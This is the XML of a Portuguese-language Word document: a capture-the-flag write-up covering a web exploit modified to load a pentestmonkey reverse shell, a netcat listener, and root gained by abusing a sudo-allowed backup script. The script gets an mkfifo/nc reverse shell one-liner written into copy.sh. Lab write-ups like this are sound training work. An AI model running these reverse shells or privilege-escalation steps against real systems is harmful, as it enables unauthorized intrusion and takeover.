            <wp:docPr id="196060949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09492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6A05" w14:textId="77777777" w:rsidR="00720FEC" w:rsidRDefault="00720FEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3737D4D6" w14:textId="5B3F609E" w:rsidR="00720FEC" w:rsidRDefault="00720F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precisamos colocar a nossa reverse shell </w:t>
      </w:r>
      <w:r w:rsidR="00361597">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dentro do exploit que baixamos, acesse ele e cole o código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D4D82" w14:textId="42D60C27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você não tenha uma, pode baixar no pentestmonkey.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73467279" w14:textId="5B71E123" w:rsidR="00361597" w:rsidRDefault="00361597">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00361597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AD6E1B1" wp14:editId="204E4850">
            <wp:extent cx="5400040" cy="1966595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18753588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58800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F198" w14:textId="77777777" w:rsidR="00361597" w:rsidRDefault="00361597">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E880FD9" w14:textId="34CE457B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Agora, ao invés de acessar o arquivo php hacked, ele irá acessar nossa reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51501B2A" w14:textId="2B92AFF0" w:rsidR="00361597" w:rsidRDefault="00361597">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0036159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74459B" wp14:editId="45259778">
            <wp:extent cx="5400040" cy="1953895"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1899720917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20917" name="Imagem 1" descr="Interface gráfica do usuário, Texto, Aplicativo, Email, Teams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4C33" w14:textId="77777777" w:rsidR="00361597" w:rsidRDefault="00361597">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654E0B13" w14:textId="4DBFDDD2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Podemos então agora inicar o nosso famoso netcat, para poder acessar a máquina.</w:t>
      </w:r>
      <w:r w:rsidR="00446B22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> E colocando o URL, porém ao invés de hacked.php, você coloca o nome da shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBBBC80" w14:textId="2B24E227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Comando usado: nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA4659" w14:textId="4FC55E55" w:rsidR="00446B22" w:rsidRDefault="00446B22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00446B2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1C0C2A3" wp14:editId="3C0070F6">
            <wp:extent cx="5400040" cy="1040765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="32700204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02043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9445" w14:textId="074E3993" w:rsidR="00446B22" w:rsidRDefault="00446B22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF0D30B" w14:textId="7ACCB451" w:rsidR="00446B22" w:rsidRDefault="00446B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só procurar com uma simples navegação de diretório o user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E47B20" w14:textId="18288489" w:rsidR="00F036F4" w:rsidRDefault="00446B22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00446B22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9C9C98F" wp14:editId="281D2B2F">
            <wp:extent cx="4020111" cy="3048425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1884734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348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9ABB" w14:textId="525E9530" w:rsidR="0027761A" w:rsidRDefault="0027761A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417F0061" w14:textId="77777777" w:rsidR="006E56C3" w:rsidRDefault="006E56C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C5B206" w14:textId="51966BD0" w:rsidR="00B52315" w:rsidRPr="000D0403" w:rsidRDefault="00B52315" w:rsidP="00B52315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0D0403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root flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394B521E" w14:textId="77777777" w:rsidR="00B52315" w:rsidRPr="00B52315" w:rsidRDefault="00B52315" w:rsidP="00B52315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B52315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462B2BD4" w14:textId="232D6DCC" w:rsidR="000955F8" w:rsidRDefault="00F036F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analisando que agora precisamos de acesso completo com root, usamos o comando sudo para poder ver que comandos podemos usar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C189D" w14:textId="4923D42C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sudo -l </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAAFCB4" w14:textId="73AFFA4D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2262C5" wp14:editId="633A2DCC">
            <wp:extent cx="5400040" cy="773430"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="10411440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44076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3E48" w14:textId="77777777" w:rsidR="00F036F4" w:rsidRDefault="00F036F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E5E6D9" w14:textId="44FB7555" w:rsidR="00F036F4" w:rsidRDefault="00F036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Podemos ver que há um arquivo interessante para dar uma olhada, o “backup.pl”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8C8D3" w14:textId="1D8ECE03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A820137" wp14:editId="07978CF2">
            <wp:extent cx="3524742" cy="876422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13137192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19270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00F5" w14:textId="77777777" w:rsidR="00F036F4" w:rsidRDefault="00F036F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62160BFB" w14:textId="26A3690B" w:rsidR="00F036F4" w:rsidRDefault="00F036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Ele nos direciona para outro, podemos dar uma olhada também</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F332E7" w14:textId="2B9319C9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5510A56" wp14:editId="660C990A">
            <wp:extent cx="5400040" cy="398780"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="819585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855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455D" w14:textId="77777777" w:rsidR="00F036F4" w:rsidRDefault="00F036F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EF39B3" w14:textId="26E25FC1" w:rsidR="00F036F4" w:rsidRDefault="00F036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Ele simplesmente nos entrega um lugar para podermos colar uma reverse shell simples. Podemos pegar no pentestmonkey e usar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3974E0" w14:textId="6A458253" w:rsidR="004A57F4" w:rsidRDefault="00217828">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021782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1376CE" wp14:editId="4B42432C">
            <wp:extent cx="5400040" cy="1195705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="15061675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6750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7592" w14:textId="77777777" w:rsidR="004A57F4" w:rsidRDefault="004A57F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDA5EBA" w14:textId="5370C94E" w:rsidR="004A57F4" w:rsidRDefault="004A57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você não consiga mudar o arquivo, use um comando simples echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA74A1" w14:textId="50727A06" w:rsidR="004A57F4" w:rsidRDefault="004A57F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A57F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4A57F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;your_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A57F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&lt;new_port&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A57F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;/tmp/f" &gt; copy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5C490" w14:textId="0221F149" w:rsidR="004A57F4" w:rsidRDefault="004A57F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A57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322827" wp14:editId="672DD0AE">
            <wp:extent cx="6172200" cy="1501140"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="3685322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3226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1015" cy="15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B756" w14:textId="528AC99C" w:rsidR="004A57F4" w:rsidRDefault="004A57F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C384EF" w14:textId="26B9ACEC" w:rsidR="004A57F4" w:rsidRDefault="004A57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Abrindo um netcat na nova porta que você abriu, e rodando novamente o comando do sudo -l conseguimos o root. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F10771" w14:textId="77777777" w:rsidR="004A57F4" w:rsidRDefault="004A57F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013D32FF" w14:textId="77777777" w:rsidR="000955F8" w:rsidRDefault="00000000" w:rsidP="000D0403">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc210330563"/>
      <w:r>
        <w:t>Conclusão</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7D17D2AD" w14:textId="1F96F3E6" w:rsidR="000955F8" w:rsidRDefault="004A57F4" w:rsidP="000D0403">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Neste CTF, foi usado desde </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, quebra de </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, busca de diretório, procura por </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  até escalação de privilégio, portanto, eu recomendo muito para dar uma leve praticada e aprimorar mais um pouco suas habilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA26FB" w14:textId="77777777" w:rsidR="000955F8" w:rsidRDefault="00000000" w:rsidP="000D0403">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc210330564"/>
      <w:r>
        <w:t>Referências</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="38B62B40" w14:textId="16DB2B55" w:rsidR="000955F8" w:rsidRDefault="00E35563" w:rsidP="00E35563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00A40A50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://crackstation.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="256A3A7E" w14:textId="3842546D" w:rsidR="00E35563" w:rsidRDefault="00E35563" w:rsidP="00E35563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00A40A50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</w:p>
    <w:p w14:paraId="2B465EE0" w14:textId="07E0BC5F" w:rsidR="00361597" w:rsidRDefault="00361597" w:rsidP="00E35563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00A40A50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E824D4D" w14:textId="77777777" w:rsidR="00E35563" w:rsidRDefault="00E35563" w:rsidP="00E35563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E35563">
      <w:headerReference w:type="default" r:id="rId34"/>
      <w:footerReference w:type="default" r:id="rId3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59A82F" w14:textId="77777777" w:rsidR="006A32A9" w:rsidRDefault="006A32A9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="78D17425" w14:textId="77777777" w:rsidR="006A32A9" w:rsidRDefault="006A3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B20944D-04F0-427C-858F-58199AFC2E41}"/>
    <w:embedBold r:id="rId2" w:fontKey="{BD468ACF-74F0-4573-8371-8C5411E1BF08}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{AFBCFC1E-4C46-4013-829C-B0DE7D3A316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65DB182F-0AC3-4482-9287-9C7324355E76}"/>
    <w:embedBold r:id="rId5" w:fontKey="{0CFBEAE2-41FF-4954-BFA5-A0356A98289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C3308" w14:textId="77777777" w:rsidR="000955F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F7CE63" w14:textId="77777777" w:rsidR="006A32A9" w:rsidRDefault="006A32A9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="000F1634" w14:textId="77777777" w:rsidR="006A32A9" w:rsidRDefault="006A3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B0A547" w14:textId="77777777" w:rsidR="000955F8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AAC96A3" wp14:editId="4A1BD58A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8DBDF62" wp14:editId="16157AAF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C19032" w14:textId="77777777" w:rsidR="000955F8" w:rsidRDefault="000955F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5F8"/>
    <w:rsid w:val="000955F8"/>
    <w:rsid w:val="000D0403"/>
    <w:rsid w:val="00160137"/>
    <w:rsid w:val="001B0A26"/>
    <w:rsid w:val="00217828"/>
    <w:rsid w:val="002316B0"/>
    <w:rsid w:val="0027761A"/>
    <w:rsid w:val="00287564"/>
    <w:rsid w:val="00361597"/>
    <w:rsid w:val="003E7E9A"/>
    <w:rsid w:val="00446B22"/>
    <w:rsid w:val="004925A5"/>
    <w:rsid w:val="004A57F4"/>
    <w:rsid w:val="006A32A9"/>
    <w:rsid w:val="006E56C3"/>
    <w:rsid w:val="00714D1F"/>
    <w:rsid w:val="00720FEC"/>
    <w:rsid w:val="00A611A3"/>
    <w:rsid w:val="00A8423E"/>
    <w:rsid w:val="00B52315"/>
    <w:rsid w:val="00C870CF"/>
    <w:rsid w:val="00D14918"/>
    <w:rsid w:val="00DA03B8"/>
    <w:rsid w:val="00E35563"/>
    <w:rsid w:val="00F036F4"/>
    <w:rsid w:val="00F573B4"/>
    <w:rsid w:val="00FE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E3682"/>
  <w15:docId w15:val="{91BD3D51-F295-4F1C-87BC-8440424C0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TtuloGuardian"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000D0403"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi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0D0403"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:caps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B52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6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34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4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3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5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9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pentestmonkey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exploit-db.com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crackstation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793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JOAO VITOR CHOUERI BRANCO</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-18T09:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-02T23:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>